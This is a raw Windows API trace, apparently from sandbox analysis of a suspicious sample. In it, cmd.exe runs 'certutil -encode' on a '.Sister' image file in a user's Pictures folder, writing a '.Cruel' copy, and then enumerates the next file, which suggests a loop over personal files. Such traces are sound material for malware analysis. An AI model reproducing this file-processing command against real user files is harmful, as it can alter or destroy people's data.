0x21ed8d45cb0 [0299.260] ??_V@YAXPEAX@Z () returned 0x1 [0299.260] ??_V@YAXPEAX@Z () returned 0x1 [0299.260] GetProcessHeap () returned 0x21ed8c70000 [0299.260] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b06d0, Size=0x180) returned 0x21ed93b06d0 [0299.260] GetProcessHeap () returned 0x21ed8c70000 [0299.260] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b06d0) returned 0x180 [0299.260] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0299.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.260] GetFileType (hFile=0x50) returned 0x2 [0299.260] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.261] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0299.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.261] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0299.268] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0299.268] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0299.268] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0299.268] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0299.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.268] GetFileType (hFile=0x50) returned 0x2 [0299.268] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.268] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0299.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.269] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0299.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.269] GetFileType (hFile=0x50) returned 0x2 [0299.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.269] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0299.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.270] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0670*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b0670*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0299.270] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\" ") returned 46 [0299.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.271] GetFileType (hFile=0x50) returned 0x2 [0299.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.271] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0299.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.271] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x2e) returned 1 [0299.273] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0299.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.273] GetFileType (hFile=0x50) returned 0x2 [0299.273] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.273] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0299.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.274] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0299.279] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0299.279] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0299.279] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0299.280] malloc (_Size=0xffce) returned 0x21eda100000 [0299.280] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0299.280] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0299.280] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0299.280] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0299.280] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0299.280] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0299.280] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0299.280] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0299.280] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0299.280] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0299.280] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0299.280] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0299.280] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0299.280] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0299.280] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0299.280] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0299.280] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0299.280] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0299.280] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0299.280] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0299.280] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0299.280] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0299.280] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0299.280] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0299.281] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0299.281] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0299.282] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0299.282] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0299.282] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0299.282] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0299.282] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0299.282] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0299.283] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0299.283] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0299.283] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0299.283] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0299.283] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0299.283] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0299.283] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0299.283] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0299.283] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0299.283] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0299.283] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0299.283] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0299.283] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0299.283] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0299.283] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0299.283] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0299.283] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0299.283] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0299.283] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0299.283] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0299.283] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0299.283] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0299.283] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0299.284] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0299.284] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0299.284] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0299.284] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0299.284] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0299.284] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0299.284] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0299.284] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0299.284] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0299.284] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0299.284] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0299.284] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0299.284] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0299.284] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0299.284] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0299.284] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0299.284] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0299.284] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0299.284] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0299.284] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0299.284] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0299.284] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0299.284] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0299.284] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0299.284] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0299.285] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0299.285] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0299.285] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0299.285] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0299.285] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0299.285] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0299.285] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0299.285] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0299.285] ??_V@YAXPEAX@Z () returned 0x1 [0299.285] GetProcessHeap () returned 0x21ed8c70000 [0299.285] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8ce9880 [0299.285] GetProcessHeap () returned 0x21ed8c70000 [0299.285] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7e) returned 0x21ed9378df0 [0299.285] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0299.285] malloc (_Size=0xffce) returned 0x21eda100000 [0299.285] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0299.285] GetProcessHeap () returned 0x21ed8c70000 [0299.286] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cf9870 [0299.287] SetErrorMode (uMode=0x0) returned 0x0 [0299.287] SetErrorMode (uMode=0x1) returned 0x0 [0299.287] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cf9880, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0299.287] SetErrorMode (uMode=0x0) returned 0x1 [0299.287] GetProcessHeap () returned 0x21ed8c70000 [0299.287] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cf9870, Size=0x54) returned 0x21ed8cf9870 [0299.287] GetProcessHeap () returned 0x21ed8c70000 [0299.287] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cf9870) returned 0x54 [0299.287] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0299.287] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0299.287] GetProcessHeap () returned 0x21ed8c70000 [0299.287] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d65c10 [0299.287] GetProcessHeap () returned 0x21ed8c70000 [0299.287] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d429f0 [0299.288] GetProcessHeap () returned 0x21ed8c70000 [0299.288] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d429f0, Size=0x1c0) returned 0x21ed937caa0 [0299.288] GetProcessHeap () returned 0x21ed8c70000 [0299.288] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937caa0) returned 0x1c0 [0299.288] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0299.288] GetProcessHeap () returned 0x21ed8c70000 [0299.288] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c75a70 [0299.288] GetProcessHeap () returned 0x21ed8c70000 [0299.288] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75a70, Size=0x7e) returned 0x21ed8c75a70 [0299.288] GetProcessHeap () returned 0x21ed8c70000 [0299.288] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75a70) returned 0x7e [0299.288] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.288] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0299.289] GetLastError () returned 0x2 [0299.289] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.289] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0299.289] GetLastError () returned 0x2 [0299.289] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.289] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd60 [0299.290] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0299.290] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0299.290] GetLastError () returned 0x2 [0299.290] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca00 [0299.290] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0299.291] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0299.291] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0299.291] ??_V@YAXPEAX@Z () returned 0x1 [0299.291] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0299.292] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0299.292] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0299.292] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0299.292] GetProcessHeap () returned 0x21ed8c70000 [0299.292] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45dd0 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.292] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0299.293] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0299.293] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0299.293] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.294] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0299.295] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0299.295] GetProcessHeap () returned 0x21ed8c70000 [0299.295] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45dd0) returned 1 [0299.295] GetProcessHeap () returned 0x21ed8c70000 [0299.295] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95a00 [0299.295] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0299.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.296] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0299.296] _get_osfhandle (_FileHandle=0) returned 0x4c [0299.296] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0299.296] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xf9c, dwThreadId=0xa20)) returned 1 [0299.311] CloseHandle (hObject=0xa8) returned 1 [0299.311] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0299.311] GetProcessHeap () returned 0x21ed8c70000 [0299.312] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0299.312] GetEnvironmentStringsW () returned 0x21ed937e320* [0299.312] GetProcessHeap () returned 0x21ed8c70000 [0299.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0299.312] FreeEnvironmentStringsA (penv="=") returned 1 [0299.312] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0299.801] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0299.801] CloseHandle (hObject=0xa4) returned 1 [0299.801] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0299.801] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0299.801] GetProcessHeap () returned 0x21ed8c70000 [0299.801] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0299.801] GetEnvironmentStringsW () returned 0x21ed937e320* [0299.801] GetProcessHeap () returned 0x21ed8c70000 [0299.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0299.802] FreeEnvironmentStringsA (penv="=") returned 1 [0299.802] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0299.802] GetProcessHeap () returned 0x21ed8c70000 [0299.802] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0299.802] GetEnvironmentStringsW () returned 0x21ed937e320* [0299.802] GetProcessHeap () returned 0x21ed8c70000 [0299.802] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0299.802] FreeEnvironmentStringsA (penv="=") returned 1 [0299.802] GetProcessHeap () returned 0x21ed8c70000 [0299.802] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a00) returned 1 [0299.802] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0299.802] ??_V@YAXPEAX@Z () returned 0x1 [0299.802] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cf8d10, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xbb62ea60, ftLastAccessTime.dwHighDateTime=0x1d5eac0, ftLastWriteTime.dwLowDateTime=0xbb62ea60, ftLastWriteTime.dwHighDateTime=0x1d5eac0, nFileSizeHigh=0x0, nFileSizeLow=0x1770f, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="lrXVOGLmm_sYY.png.Sister", cAlternateFileName="")) returned 1 [0299.802] GetProcessHeap () returned 0x21ed8c70000 [0299.802] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x1f6) returned 0x21ed8d45640 [0299.802] GetProcessHeap () returned 0x21ed8c70000 [0299.803] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45640) returned 0x1f6 [0299.803] GetProcessHeap () returned 0x21ed8c70000 [0299.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0860 [0299.803] GetProcessHeap () returned 0x21ed8c70000 [0299.803] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0860, Size=0x58) returned 0x21ed93b0860 [0299.803] 